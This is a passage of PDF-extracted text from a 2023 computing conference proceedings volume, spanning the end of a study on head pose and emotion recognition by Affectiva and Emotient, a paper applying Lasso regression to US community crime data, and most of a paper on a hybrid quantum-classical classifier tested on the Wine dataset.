explain the variation in PAS values; nonetheless, they both reveal significant interactions of gender and age on the projected emotion. Modelling YPR.df values, frame by frame change in yaw-pitch-roll vectors, similarly also produces significant interactions among gender, system-calculated emotion and age, for each system, but with much lower R-squared values. The effect interactions, all are all significant, and p < 0.001. For Emotient, adjusted R2 is 0.002957 (F-statistic: 106.3 on 27 and 958211 DF, p < 2.2e − 16); for Affectiva, adjusted R2 is 0.005431 (F-statistic: 194.8 on 27 and 958211 DF, p < 2.2e − 16). More so than for the PAS models, the linear models predicting YPR.df lack explanatory variables.4 Figure 7 illustrates the nature of these interactions: for Affectiva, females in the dataset studied have pose angle magnitude sums that are greater than or equal to those of males for each emotion label except joy, fear and surprise; for Emotient, females have PAS values greater than or equal to those of males for all emotions labels except surprise. Table 11 presents the mean PAS values underlying these interaction plots. Thus, Affectiva and Emotient both reach qualitatively different judgements between genders for measurements of the confluence of angular position and surprise. Table 11. Means of posed angle sums for each system and its most probable emotion calculation, for each gender System
Gender Anger Contempt Disgust Fear
Joy
Sadness Surprise
Affectiva Female 38.168 32.579
23.830
15.521 20.458 21.724
20.957
Affectiva Male
31.781 27.737
22.878
24.792 25.039 21.128
22.758
Emotient Female 19.461 18.899
17.256
15.293 17.305 17.816
15.981
Emotient Male
16.339
14.939 14.191 15.269
17.127
15.979 17.106
Figure 8 and Table 12 present the interaction between gender and systemcalculated most probable emotion on the change in YPR vectors. Table 12. Means of change in YPR vectors for each system and its most probable emotion calculation, for each gender System
Gender Anger
Contempt Disgust Fear
Joy
Sadness Surprise
Affectiva Female 0.00074 0.00039
0.00021 0.00015 0.00019 0.00014 0.00018
Affectiva Male
0.00031 0.00044
0.00024 0.00023 0.00024 0.00023 0.00019
Emotient Female 0.00082 0.00050
0.00058 0.00030 0.00038 0.00054 0.00058
Emotient Male
0.00027 0.00027 0.00025 0.00034 0.00039
4
0.00037 0.00031
Our task here is not to identify complete theories of variation in PAS or YPR.df, but rather to assess the interaction of particular factors on head position and motion.
40
probable_emotion_y
probable_emotion_x
20
mean of E.Pose.Angle.Sum
30
surprise contempt disgust anger sadness fear joy
0
0
10
20
30
anger contempt joy fear disgust surprise sadness
10
mean of A.Pose.Angle.Sum
93
40
Head Orientation and Movement Effects
FEMALE
MALE
FEMALE
Gender
MALE Gender
Fig. 7. Interaction between system-assigned probable emotions and gender on pose angle magnitude sums. On the left, the values for affectiva are shown (y = Affectiva) and on the right, values for emotient are shown (x = Emotient).
6e−04
surprise anger sadness contempt disgust fear joy
4e−04
mean of E.YPR.df
8e−04
probable_emotion_x
0e+00
0e+00
2e−04
4e−04
6e−04
contempt anger joy disgust fear sadness surprise
2e−04
mean of A.YPR.df
8e−04
probable_emotion_y
FEMALE
MALE Gender
FEMALE
MALE Gender
Fig. 8. Interaction between system-assigned probable emotions and gender on change in YPR vectors. On the left, the values for affectiva are shown (y = Affectiva) and on the right, values for emotient are shown (x = Emotient).
For Affectiva, males show greater change in position vectors for all emotions but anger, while for Emotient, females show greater change in position vectors for all emotions. With focus upon age, it may be noted that there is a small (but significant) negative Spearman correlation between age and posed angle sum (ρ = −0.16483049; p < 2.2e − 16) for Affectiva, and a greater magnitude small negative Spearman correlation between age and posed angle sum for Emotient (ρ = −0.2899963; p < 2.2e − 16). Table 13 illustrates the mean values of PAS for each system according to ordinal age categories derived from quartiles of age values.
94
Y. P. K. Murali et al.
Table 13. Means of posed angle sums for each system, according to ordinal age categories derived from age quartiles System
[28, 50] (50, 61] (61, 68] (68, 91]
Affectiva 24.449
30.573
25.829
18.780
Emotient 18.184
17.683
16.239
12.634
These observations support the generalization that age is accompanied by smaller angles in head position, or more colloquially: with age, extreme poses are less likely.5 Table 14 shows the means of YPR.df values by age group. Both systems identify least movement for the greatest age category. Table 14. Means of YPR.df for each system, according to ordinal age categories derived from age quartiles System
[28, 50] (50, 61] (61, 68] (68, 91]
Affectiva 0.00022 0.00034 0.00031 0.00017 Emotient 0.00030 0.00043 0.00046 0.00025
5
Conclusions
We have demonstrated that although differences in critical measures constructed by Affectiva and Emotient are significant, within each, comparable patterns of interaction are visible in the judgments of emotion and aggregated quantities associated with head position and change in head position. The greatest agreement between systems on the interaction of gender and angular position (using the posed angle sum aggregation) with emotion labels is for the emotion surprise, where for both systems females have smaller angular magnitude summation values than for males, against a contrasting trend of females having larger angular magnitude summation values than males for other emotion labels. It has been demonstrated that the two systems lead to different judgments of effects on the measurements made, depending on the measurement examined (e.g. posed angle sum vs YPR.df). The systems also differ in their calculation of probable emotions, but using each system’s own determination of the likely emotion, the effects on measures of head position and movement vary. 5
An alternative generalization is that with age, politicians, CEOs and spokespeople are more likely to focus more directly to the camera recording the utterances. Here, and independently of the age variable, data recording whether teleprompters were activated or not would be useful, inasmuch as gazing at a teleprompter to access speech content would thwart wide angular positions. Implicit here is an assumption that for all of the recordings, a single “face-on” camera was available and provided a primary focal point for the speaker. For speeches recorded with multiple-camera arrangements, it is natural that from the perspective of the video stream available, attention to other cameras would appear as angled positions.
Head Orientation and Movement Effects
95
Acknowledgments. We are grateful to the GEstures and Head Movement (GEHM) research network (Independent Research Fund Denmark grant 9055-00004B). We thank Subishi Chemmarathil for helpful efforts in data collection and curation.
References 1. Ahmad, K., Wang, S., Vogel, C., Jain, P., O’Neill, O., Sufi, B.H.: Comparing the Performance of Facial Emotion Recognition Systems on Real-Life Videos: Gender, Ethnicity and Age. In: Arai, K. (ed.) FTC 2021. LNNS, vol. 358, pp. 193–210. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-89906-6 14 2. Ahmed, F., Bari, A.S.M.H., Gavrilova, M.L.: Emotion recognition from body movement. IEEE Access 8, 11761–11781 (2019) 3. Bartlett, M.S., Littlewort-Ford, G., Movellan, J., Fasel, I., Frank, M.: Automated facial action coding system, 27 December 2016. US Patent 9,530,048 4. Ekman, P., et al.: Universals and cultural differences in the judgments of facial expressions of emotion. J. Pers. Soc. Psychol. 53(4), 712 (1987) 5. Ekman, P., Oster, H.: Facial expressions of emotion. Annu. Rev. Psychol. 30(1), 527–554 (1979) 6. El Kaliouby, R.: Mind-reading machines: automated inference of complex mental states. Ph.D. thesis, The Computer Laboratory, University of Cambridge, 2005. Technical Report no. UCAM-CL-TR-636 (2005) 7. Johnson, D.O., Cuijpers, R.H.: Investigating the effect of a humanoid robot’s head position on imitating human emotions. Int. J. Soc. Robot. 11(1), 65–74 (2019) 8. Keltner, D., Sauter, D., Tracy, J., Cowen, A.: Emotional expression: advances in basic emotion theory. J. Nonverbal Behav. 43(2), 133–160 (2019) 9. Koppensteiner, M., Grammer, K.: Motion patterns in political speech and their influence on personality ratings. J. Res. Pers. 44(3), 374–379 (2010) 10. Littlewort, G., et al.: The computer expression recognition toolbox (CERT). In: 2011 IEEE International Conference on Automatic Face & Gesture Recognition (FG), pp. 298–305. IEEE (2011) 11. McDuff, D., Mahmoud, A., Mavadati, M., Amr, M., Turcot, J., Kaliouby, R.: AFFDEX SDK: a cross-platform real-time multi-face expression recognition toolkit. In: Proceedings of the 2016 CHI Conference Extended Abstracts on Human Factors in Computing Systems, pp. 3723–3726 (2016) 12. Toscano, H., Schubert, T.W., Giessner, S.R.: Eye gaze and head posture jointly influence judgments of dominance, physical strength, and anger. J. Nonverbal Behav. 42(3), 285–309 (2018) 13. Wallbott, H.G.: Bodily expression of emotion. Eur. J. Soc. Psychol. 28(6), 879–896 (1998) 14. Werner, P., Al-Hamadi, A., Limbrecht-Ecklundt, K., Walter, S., Traue, H.C.: Head movements and postures as pain behavior. PLoS ONE 13(2), e0192767 (2018) 15. Zhang, X., et al.: Bp4d-spontaneous: a high-resolution spontaneous 3d dynamic facial expression database. Image Vis. Comput. 32(10), 692–706 (2014)
Using Machine Learning to Identify Top Antecedents Affecting Crime in US Communities Kamil Samara(B) University of Wisconsin-Parkside, Kenosha, USA [email protected]
Abstract. One of the main concerns for countries has been always crime activities. In recent years, with the development of data collection and analysis techniques, a massive number of data-related studies have been performed to analyze crime data. Studying indirect features is important yet challenging task. In this work we are using machine learning (ML) techniques to try to identify the top variables affecting crime rates in different US communities. The data used in this work was collected from the Bureau of the Census and Bureau of Justice Statistics. Out of the 125 variables collected in this data we will try to identify the top factors that correlate with higher crime rates either in a positive or a negative way. The analysis in this paper was done using the Lasso Regression technique provided in the Python library Scikit-learn Keywords: Machine learning · Lasso regression · Crime
1 Introduction Crime as a socioeconomic complication has shown multifaceted associations with socioeconomic, and environmental aspects. Trying to recognize patterns and connections between crime and these factors is vital to understand the root causes of criminal activities. By detecting the source causes, legislators can instrument solutions for those source causes, eventually avoiding most crime sources [1]. In the age of information technology, crime statistics are recorded in data bases for studying and analysis. Manual analysis is impractical due to the vast size of stored data. The suitable solution here is to use data science and machine learning techniques to analyse the data. Using the descriptive and predictive powers of those solutions officials will be able to minimize crime. The descriptive and predictive powers of machine learning techniques can give longstanding crime prevention solutions. This predictive analysis could be done on two levels. First, predicting when and where the crimes will happen. But this type of prediction is hard to implement because predictions are highly sensitive to complex disseminations of crimes in time and space. Second, focusing predictions on identifying the correlations of crimes with socioeconomic, and environmental aspects [2]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 96–101, 2023. https://doi.org/10.1007/978-3-031-28073-3_7
Using Machine Learning to Identify Top Antecedents
97
Lately machine learning methods have grew in popularity. Among the most popular approaches is Bayesian model, random forest, K-Nearest Neighbors (KNN), neural network, and support vector machine (SVM) [3]. As a step toward crime prediction using machine learning techniques, the proposed work in this paper uses the Lasso Regression technique to predict the top socioeconomic, and environmental factors related to crime rates in US cities. The study was performed using data collected form the Bureau of the Census and Bureau of Justice Statistics. The remaining of the paper is organized as follows: Sect. 2 is related work, Sect. 3 presents the work done is this study and Sect. 4 concludes the work.
2 Related Work Crime is a global problem, which motivated my researchers to apply machine learning techniques to perform predictive analytics in an effort to detect crime factors. The performed studies range in complexity depending on the volume of the datasets used in the study and the number of variables collected. A common crime prediction analysis is the focus on temporal data. A common reason behind this emphasis is crime data sets contain data collected over many years. An example of such analysis is the work of Linning in [4]. Linning has studied the variation of crime throughout the year to predict a pattern over seasons. The main observation was crime peaks in the hot summer seasons as compared to cold winter seasons. In a similar study [5], authors have examined the crime data of two major US cities and compared the statistical investigation of the crimes in these cities. The main goal of the study was to use agent-based crime environment simulation to identify crime hotspots. In [6], Nguyen and his team used data from the Portland Police Bureau (PPB) augmented with census data from other public sources to predict crime category in the city of Portland using Support Vector Machine (SVM), Random Forest, Gradient Boosting Machines, and Neural Networks. A unique approach to classify crime from crime reports into many categories using textual analysis and classification was done in [7]. The authors used five classification methods and concluded that Support Vector Machines (SVM) performed better than the other methods. The researches in [8], used data extracted from the neighborhoodscout.com from the University of California-Irvine, in the state of Mississippi to predict crime patterns using additive linear regression. Graph based techniques were used in [9] to mine datasets for correlation. The objective was to identify top and bottom correlative crime patterns. In the author’s final remarks, they conclude that it successfully discovers both positive and negative correlative relations among crime events and spatial factors and is computationally effective.
98
K. Samara
3 Proposed Work The scope of this work is to analyze crime data in an effort to recognize top factors affecting crime plausibility. The features considered in this work are socio-economic factors like race, number of people in living in the same house, and mean house income. Python was the programming language of choice in this work. To perform the regression part, the Lasso model in the Scikit-learn library was used. Scikit-learn is a free software machine learning library for the Python programming language. 3.1 Dataset The dataset used in this paper is the “Communities and Crime Unnormalized Data Set” available at the University of California Irvine (UCI) Machine Learning Repository. This data set’s main focus is communities in the United States and was combined from the following sources: 1995 US FBI Uniform Crime Report, 1990 United States Census, 1990 United States LEMAS (Law Enforcement Management and Administrative) Statistics Survey. In July 2009, this data set was presented to the UCI Machine Learning Repository [10]. The data set includes 2215 total examples and 125 features for different communities across all states. Features contain data blended from a diverse source of crime-related information, extending from the number of vacant households to city density and percent of people foreign born, to average household income. Also included are measures of crimes considered violent, which are murder, rape, robbery, and assault. Only features that had plausible connection to crime were included. So unrelated features were not included [10]. 3.2 Lasso Regression Lasso (Least Absolute Shrinkage and Selection Operator) regression is part of the linear regression family that utilizes reduction. Reduction is where data values are contracted near a central value, like the average. The lasso technique promotes models with less parameters. The lasso regression is more suitable for models expressing high levels of multicollinearity [11]. Lasso regression performs L1 regularization. As shown in Eq. 1, L1 regularization works by enforcing a penalty equivalent to the absolute value of the magnitude of coefficients. L1 regularization encourages models with few coefficients. This can be achieved by reducing some coefficients to become zero and get removed from the model. L1 regularization helps produce simpler models since larger penalties result in coefficient values almost zero. On the other hand, Ridge regression (e.g., L2 regularization) doesn’t result in removal of coefficients or sparse models. This makes the L1 regularization far easier to interpret than the L2 regularization [11]. RSSLASSO (w, b) =
N {i=1}
(yi − (w.xi + b))2 + α
p {i=1}
wj
(1)
Using Machine Learning to Identify Top Antecedents
99
where: Yi: target value w. xi + b: predicted value α: controls amount of L1 regularization (default = 1.0) 3.3 Feature Normalization Before applying the Lasso regression on the dataset, a MinMax scaling of the features was done. It is crucial in several machine learning techniques that all features are on the same scale (e.g. faster convergence in learning, more uniform or ‘fair’ influence for all weights) [12]. For each feature Xi: compute the min value XiMIN and the max value XiMAX achieved across all instances in the training set. For each feature: transform a given feature xi value to a scaled version x using e (2) xi = xi − xiMIN / xiMAX − xiMIN
3.4 Alpha Value Selection The parameter α controls amount of L1 regularization done in the Lasso linear regression. The default value of alpha is 1.00. To use the Lasso regression efficiently the appropriate value of alpha must be selected. To decide the appropriate value of alpha, a range of alpha values were compared using the r-squared value. R-squared (R2) is a statistical measurement which captures the proportion of the change of a variable that’s explained by another variable or variables in a regression fashion [12]. The alpha values used in the comparison were: [0.5, 1, 2, 3, 5, 10, 20, 50]. The results of the comparison are shown in Table 1. As we can see in Table 1, the highest r-squared value was achieved at an alpha value of 2. Table 1. Effect of alpha regularization Alpha value
Features kept
R-squared value
0.5
35
0.58
1
25
0.60
2
20
0.63
3
17
0.62
5
12
0.61
10
6
0.58
20
2
0.50
50
1
0.30
100
K. Samara
3.5 Results For alpha = 2.0, 20 out of 125 features have non-zero weight. Top features (sorted by abs. Magnitude are shown in Table 2. Higher weights indicate higher importance and impact of the feature on crime rate. Positive weights for features mean a positive correlation between the feature value and crime rate. On the other hand, negative weights for features mean a negative correlation between the feature value and crime rate. Table 2. Features with non-zero weight (sorted by absolute magnitude) Feature PctKidsBornNeverMar
Weight 1488.365
Description Kids born to never married parents
PctKids2Par
−1188.740
HousVacant
459.538
Unoccupied households
PctPersDenseHous
339.045
Persons in compact housing
NumInShelters
264.932
People in homeless shelters
MalePctDivorce
259.329’
Divorced males
Kids in family with two parents
PctWorkMom
−231.423
Moms of kids under 18 in labor force
pctWInvInc
−169.676
Households with investment
agePct12t29
−168.183
In age range 12–29
PctVacantBoarded
122.692
Vacant housing that is boarded up
pctUrban
119.694
People living in urban areas
MedOwnCostPctIncNoMtg
104.571
Median owners’ cost
MedYrHousBuilt,
91.412
Median year housing units built
RentQrange
86.356
Renting a house
OwnOccHiQuart
73.144
Owning a house
PctEmplManu
−57.530
People 16 and over who are employed in manufacturing
PctBornSameState
−49.394
People born in the same state as currently living
PctForeignBorn
23.449
People foreign born
PctLargHouseFam
20.144
Family households that are large (6 or more)
PctSameCity85
5.198
People living in the same city
Although there are many interesting features to discuss from the results shown in Table 2, we will focus our interest on the top two features. The top antecedent from the list of features was Kids Born to Never Married with a positive weight of 1488.365. The second antecedent was Kids in Family Housing with Two Parents with a negative weight of −1188.740. These two top antecedents indicate the importance of a stable family (two parents are present) for raising kids whom less likely to commit crime in the future.
Using Machine Learning to Identify Top Antecedents
101
4 Conclusion In this study, we employed machine learning through the use of Lasso linear regression in effort to predict socio-economic antecedents that affect crime rate in US cities. The regression model was implemented on a data set that was sourced from the 1995 US FBI Uniform Crime Report, 1990 United States Census, 1990 United States LEMAS (Law Enforcement Management and Administrative) Statistics Survey. The regression results pointed out that the topmost influential factors affecting crime in US cities are related to stable families. Kids born into families with two parents are less likely to commit crime. These findings should help policy makers to create strategies and dedicate fundings to help minimize crime.
References 1. Melossi, D.: Controlling Crime, Controlling Society: Thinking about Crime in Europe and America. 1st edn. Polity, (2008) 2. Herath, H.M.M.I.S.B., Dinalankara, D.M.R.: Envestigator: AI-based crime analysis and prediction platform. In: Proceedings of Peradeniya University International Research sessions, vol. 23, no. 508, p. 525 (2021) 3. Baumgartner, K.C., Ferrari, S., Salfati, C.G.: Bayesian networkmodeling of offender behavior for criminal profiling. In: Proceedings of the 44th IEEE Conference on Decision and Control (CDC-ECC), pp. 2702–2709 (2005) 4. Linning, S.J., Andresen, M.A., Brantingham, P.J.: Crime seasonality: examining the temporal fluctuations of property crime in cities with varying climates. Int. J. Offender Ther. Comp. Criminol. 61(16), 1866–1891 (2017) 5. Almanie, T., Mirza, R., Lor, E.: Crime prediction based on crime types and using spatial and temporal criminal hotspots. arXiv preprint arXiv:1508.02050 (2015) 6. Nguyen, T.T., Hatua, A., Sung, A.H.: Building a learning machine classifier with inadequate data for crime prediction. J. Adv. Inf. Technol. 8(2) (2017) 7. Ghosh, D., Chun, S., Shafiq, B., Adam, N.R.: Big data-based smart city platform: realtime crime analysis. In: Proceedings of the 17th International DigitalGovernment Research Conference on Digital Government Research, pp. 58–66. ACM (2016) 8. McClendon, L., Meghanathan, N.: Using machine learning algorithms to analyze crime data. Mach. Learn. Appl. Int. J. (MLAIJ) 2(1), 1–12 (2015) 9. Phillips, P., Lee, I.: Mining top-k and bottom-k correlative crime patterns through graph representations. In: 2009 IEEE International Conference on Intelligence and Security Informatics, pp. 25−30 (2009). https://doi.org/10.1109/ISI.2009.5137266 10. Asuncion, A., Newman, D.J.: UCI Machine Learning Repository, School of Information and Computer Science, University of California, Irvine, CA (2007). https://www.archive.ics.uci. edu/ml/datasets/Communities+and+Crime 11. Kumar, D.: A Complete understanding of LASSO Regression. The Great Learning (26 December 2021). https://www.mygreatlearning.com/blog/understanding-of-lasso-regres sion/#:~:text=Lasso%20regression%20is%20a%20regularization,i.e.%20models%20with% 20fewer%20parameters) 12. Kuhn, M., Johnson, K.: Feature Engineering and Selection: A Practical Approach for Predictive Models, 1st edn. CRC Press, New York (2019)
Hybrid Quantum Machine Learning Classifier with Classical Neural Network Transfer Learning Avery Leider(B) , Gio Giorgio Abou Jaoude, and Pauline Mosley Pace University, Pleasantville, NY 10570, USA {al43110n,ga97026n,pmosley}@pace.edu
Abstract. The hybrid model uses a minimally trained classical neural network as a pseudo-dimensional pool to reduce the number of features from a data set before using the output for forward and back propagation. This allows the quantum half of the model to train and classify data using a combination of the parameter shift rule and a new “unlearning rate” function. The quantum circuits were run using Penny-Lane simulators. The hybrid model was tested on the wine data set to promising results of up to 97% accuracy. The inclusion of quantum computing in machine learning represents great potential for advancing this area of scientific research because quantum computing offers the potential for vastly greater processing capability and speed. Quantum computing is currently primitive; however, this research takes advantage of the mathematical simulators for its processing that prepares this work to be used on actual quantum computers as soon as they become widely available for machine learning. Our research discusses a benchmark of a Classic Neural Network as made hybrid with the Quantum Machine Learning Classifier. The Quantum Machine Learning Classifier includes the topics of the circuit design principles, the gradient parameter-shift rule and the unlearning rate. The last section is the results obtained, illustrated with visual graphs, with subsections on expectations, weights and metrics. Keywords: Machine learning · Transfer learning · Deep learning Quantum Machine Learning Classifier · Quantum computing mathematics
1
·
Introduction
The Hybrid Quantum Machine Learning Classifier (HQMLC) was developed in Python based off a previous Quantum Machine Learning Classifier [6] and an open source classical network framework found on GitHub [7]. The HQMLC was trained and tested on the machine learning Wine dataset [10]. The code is available on Google Colab in two public Jupyter notebooks [4,5]. All links, comments and references for the code are given under the links and references tabs of the Colab notebooks. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 102–116, 2023. https://doi.org/10.1007/978-3-031-28073-3_8
Hybrid Quantum Machine Learning Classifier with Transfer Learning
103
The HQMLC is a combination model composed of a classical neural network and a quantum machine learning classifier. The hybrid model works by first training the classical network on the data for one epoch using a large learning rate. The small classical network is then folded to remove a layer in a process similar to transfer learning. All the data is propagated through the folded network. The output of this network is treated as data of reduced dimensionality. It is re-scaled and passed through to the quantum machine learning classifier that trains on this data of reduced dimension in a process similar to previous work [6]. The Wine data set [10] consists of 178 measurements. The data is the result of a chemical analysis done on wine from three cultivars in the same region of Italy. Cultivars are a plant variety produced in cultivation by selected breeding. There are 13 attributes of these cultivars: alcohol, malic acid, ash, alkalinity of ash, magnesium, total phenols, flavanoids, nonflavanoid phenols, proanthocyanins, color intensity. hue, OD280/OD315 of diluted wines, and proline. All attributes are continuous. The dataset has three targets referred to as targets zero, one and two. In the previous Quantum Machine Learning Classifier [6], the dataset was also on three targets of iris flower species but they only had four attributes, so the wine dataset is a significantly more challenging dataset to work on for classification. Figure 1 shows a correlation matrix that illustrates the relationships between the measured characteristics in the data set. Red values are positive correlations and blue values are negative correlations. Zero is a neutral relationship. This correlation matrix is showing how strongly one characteristic feature attribute is directly correlated to another. A positive number (signified by a red square) means that if one attribute is present in a certain degree, then the second attribute on the corresponding row or column is also present to that degree with the likelihood of that standardized value. Otherwise, there is a negative correlation. The statistics of the data are given in Fig. 2 and Fig. 3. As customary in machine learning algorithms, the data was split into a training subset and a testing subset, proportioned 75% training and 25% testing. This means 45 measurements were used in every epoch for testing. The rest of this paper discusses the Classic Neural Network, the Quantum Machine Learning Classifier. The Quantum Machine Learning Classifier includes the topics of the circuit design principles, the gradient parameter-shift rule and the unlearning rate. The last section is the results obtained, illustrated with visual graphs, with subsections on expectations, weights and metrics. This is followed by a section on future work, and a list of helpful definitions.
2
The Classic Neural Network
The classical neural network was designed using the GitHub repository [7] with modifications done to better tackle a hybrid model. The network shown in Fig. 4 was used. The input layer contained 13 neurons, one for each feature. The hidden layer contained six neurons to match the number of features that would be accepted by the circuits in the second half of the hybrid model. The output
104
A. Leider et al.
Fig. 1. Correlation matrix of wine data set
Fig. 2. Statistics of wine data set 1/2
Hybrid Quantum Machine Learning Classifier with Transfer Learning
105
Fig. 3. Statistics of wine data set 2/2
layer contained three neurons, one for each target. Different activation functions were attempted for the final layer to little difference. The sigmoid activation function preformed the best by a small margin. The cost function used the sum of squared errors with a learning rate of 0.25 over one epoch. More testing is needed on the network design including hyper-parameters but, based on limited results, larger than typical learning rates and linear activation functions proved most successful. The accuracy of the classical neural network after one epoch is appreciably low. It was tested in a quality control measure. After the epoch, the neural network is folded to only two layers, shown in Fig. 5. This folded network functioned as a means of reducing the dimensionality of the features. The entire data set was propagated through the network. The output of this propagation was treated as a dataset that was re-scaled using normalization and multiplied by π (pi) as was suggested in previous work [6]. This dataset now consisted of six unit-less features and is referred to as the pooled data set.
3
Quantum Machine Learning Classifier
The Quantum Machine Learning Classifier (QMLC) is an iteration of the previous model [6]. The QMLC works on three key components. The quantum circuits used to make the classifier were based on the Capelletti design principles [1] with modifications made to fit in a multi-classification problem. The gradient parameter-shift rule used to determine the gradients have been extensively studied by other researchers including the PennyLane developers [9]. Finally, the novel component in this iteration of the QMLC is the non-intuitive “unlearning rate” used as a mechanism to attune each circuit to the data that matches their target by decreasing their affinity to produce high expectation values with data from every other target. Each of these components are explained further in later sections. The basic design of the QMLC consists of identical quantum circuits for each target of the classification problem. Using tools described later, each circuit is attuned to the data relating to a particular target by encoding the data as parameters in the circuit and changing the weights of that circuit to produce
106
A. Leider et al.
higher expectation values for that data. In principle, if a row of data is describing a target, then the circuits should produce expectation values that are low except for the circuit corresponding to that target. This is the basic working principle of quantum computing that has proven successful. The circuit design used to create the classifier at Fig. 6 is given using Qiskit [8]. 3.1
Circuit Design Principles
The work by Capelletti [1] gives general guidelines on the design of quantum circuits for the purposes of machine learning. Their guidelines were tested on the simpler Iris data set and proved successful. Many of those design principles were employed here on the more complex Wine data set.
Fig. 4. Full classical neural network
Hybrid Quantum Machine Learning Classifier with Transfer Learning
107
Fig. 5. Folded classical neural network
Fig. 6. The QMLC circuit design
The first guideline followed was that the gates remain uni-dimensional. All the gates use rotations along the X-axis for the features and weights. This adds a level of simplicity to the circuitry. The CZ gates in the circuit alternate in direction until the measurement is taken on the right end of the circuit. The second guideline followed was the general shape of the circuit. An emphasis was given on keeping a long and thin shape, with the use of minimal qubits. This may allow for the later testing of the model on real quantum computers in the future, with smaller topology designs even for larger target numbers. The final guideline followed was the proportion of weights to features and their placement in the circuit. As seen in Fig. 6, there are nearly twice as many weights as there are features. This is by intent. This design provides the best results of the QMLC without overtaxing the optimization process with too many weights.
108
A. Leider et al.
By virtue of the design, an even number of features will result in a superfluous final weight in the bottom qubit if the same pattern of two weights after two qubits is used before measuring expectation. This is why the final weight is omitted. Adding a weight to the circuit design at that location would serve no purpose. The output of the quantum circuit using a PennyLane [9] backend is an expectation value between [−1, 1]. For simplicity, when describing the results in later sections, the range of expectation values are shifted to between [0, 1] by adding one and dividing by two. Changing the bounds in this manner allowed for easier analysis and explanation of the results. 3.2
Gradient Parameter-Shift Rule
Over the course of training a QMLC, the gradient is used to change the weights so that the output of the circuits increase when encoded with rows of data matching their target. The gradient is key to this process. It is calculated using the gradient parameter-shift rule. This rule is studied by many including PennyLane [9]. The equation is outlined below in Eq. 1 with respect to an individual weight Θi (Theta). (Θ) = 1 B Θ − π ei Θ + π ei − B (1) ∇Θi B 2 2 2 During training, each circuit is encoded with the next row of data. The circuit gradients for each weight are calculated, which include direction (positive or negative) and magnitude. If the circuit number matches the target number for that row of data, the gradient is multiplied by the learning rate (alpha) and added to the current weight. If the circuit does not match the next target, it is moved in the opposite direction with a magnitude modified by the unlearning rate explained below. 3.3
Unlearning Rate
In typical machine learning explanations, the multivariate depiction of the cost function is a three dimensional surface with saddles, minima and maxima. The objective, in most models, is to find the combination of weight values that give the global minima. Re-purposing the gradient function to increase the expectation values can be thought of as moving the weights over a similar surface with the goal of finding the global maxima. For this reason, the visualization can also be re-purposed. There is one major difference. The weights of one circuit do not have any consequence on the output or gradient calculations on the other circuits. This means that the surfaces describing the optimal weights to produce higher expectation values for each circuit are then disjointed from each other. This leads to poor QMLC results when navigating each circuit through their own surface. The solution is the unlearning rate. When a row of data is used to optimize the classifier, the data is encoded into each circuit. For the circuit that matches the target corresponding to the row of
Hybrid Quantum Machine Learning Classifier with Transfer Learning
109
data, the weights are moved in the direction to increase the expectation value of the circuit as described earlier. Every other circuit has the gradient multiplied by a factor proportional to the output of the circuits. This proportion is equal to the sum of the expectation value of the circuits that do not match the target divided by the sum of all the expectation values as shown in the code below. Target expectation is the output of the circuit that matches the row of data and sum expectation is the sum of all expectation values for that row of data. By using the expectation values as a proportion with which to modify the circuits, the surfaces described previously can be linked. target_expectation = circuit(features, weights[target]) expectations = calc_expectations(features, weights, num_circuits = 3) sum_expect = sum(expectations) beta = (sum_expect - target_expectation) /sum_expect
The two equations below are paraphrased from the code [5]. The first shows the changes made to the weights (called parameters or params) made when the weight is in a circuit corresponding to the features in a row of data. The second shows the changes made to the weights when the weight is in a circuit that does not correspond to a row of data. The unlearning rate is denoted by beta in regards to the learning rate typically being denoted by alpha. params += alpha*parameter_shift(features, params) params += (-alpha*beta)*parameter_shift(features, params) The use of the unlearning rate helps the weights of one circuit avoid a configuration that matches the behaviour of another circuit by adjusting the path created by gradient descent. This is normally not needed in models where the gradient is calculated with respect to all other weights but is needed here when circuit weights do not effect the expectation values of other circuits. It is a peculiar work around that needs further study.
4
Results
All results were recorded over every optimization of the classifier during training. This significantly slowed the efficiency of the QMLC but was necessary to the study of the model. The findings and results are discussed below. 4.1
Expectations
The QMLC produces an expectation value for each target in the classification problem. By design, the expectations values produced are randomized at the early epochs of training. During the course of training, this improves. If the circuit is working properly, it will produce low expectation values when looking
110
A. Leider et al.
at rows of data not corresponding to its’ target and vice versa. Each circuit becomes more attuned to their respective target and increases the variance of their output. In Fig. 7, we see that this trial has the expectations of the QMLC initially hovering closer to the center.
Fig. 7. Initial expectations of the QMLC hovering closer to the center
As the training continues with each gradient, the expectation value moves to the extreme edges, [0, 1], more frequently. This can also be seen in Fig. 8. If the classifier is working properly, the circuit variances should mostly increase with training. 4.2
Weights
As suggested in previous work [6], the weights were randomly generated between [0, 2π]. This leads to significant increases in training speed. The weights had smaller distances to move and less frantic turns in direction. Figure 9 shows the weights for all circuits. The repetitive “static” like motion that the weights exhibit come from non-stochastic gradient descent. The classifiers are optimized by the same data in the same order every epoch. This means that the weights are pushed and pulled in the same order, resulting in the “static”. Like in previous work [6], momentum operators or stochastic gradient descent may result in stabilizing the motion of the weights. Figure 10 shows, by comparison, the weights for just target number 0, and Fig. 11 the weights for target number 1, and Fig. 12 for target number 2.
Hybrid Quantum Machine Learning Classifier with Transfer Learning
111
Fig. 8. Circuit variances increasing with training
4.3
Metrics
The metrics recorded, shown in Fig. 13, were an improvement on previous iterations of the QMLC [6]. Again, the model was able to over fit at an even faster speeds. This is attributed to the changes made in weight generation and the unlearning rate equation. It should be noted That the classifier did not constantly improve.
5
Future Work
The continued success of the quantum machine learning model is promising. Future exploration is needed into the hyper parameters, network layers and
Fig. 9. Recordings of the weights over the course of training
112
A. Leider et al.
Fig. 10. Recordings of the circuit associated with target 0
Fig. 11. Recordings of the circuit associated with target 1
other aspects of the model. With more advancements in quantum computing, it is reasonable to assume there will be more access to qubits for academic research. Therefore, the next goal is to study larger data sets using quantum circuits rather than simulating the mathematics. Further study is needed to understand the effect of the unlearning rate and the possible use of parallelization.
Hybrid Quantum Machine Learning Classifier with Transfer Learning
113
Fig. 12. Recordings of the circuit associated with target 2
Fig. 13. Recordings of the quantum machine learning classifier metrics over the course of training
6
Definitions
For a more robust list, including previous definitions, refer our previous work [6]. Quantum computing is a cross-section of computer science and quantum mechanics, a new science that is growing with new terms. Included here is a section reviewing the terms of quantum computing that are directly relevant. This covers quantum bits (“qubits”) and the specific gates, the CN OT gate, CZN OT and the RX gate, used in this quantum circuit for the quantum machine learning classifier.
114
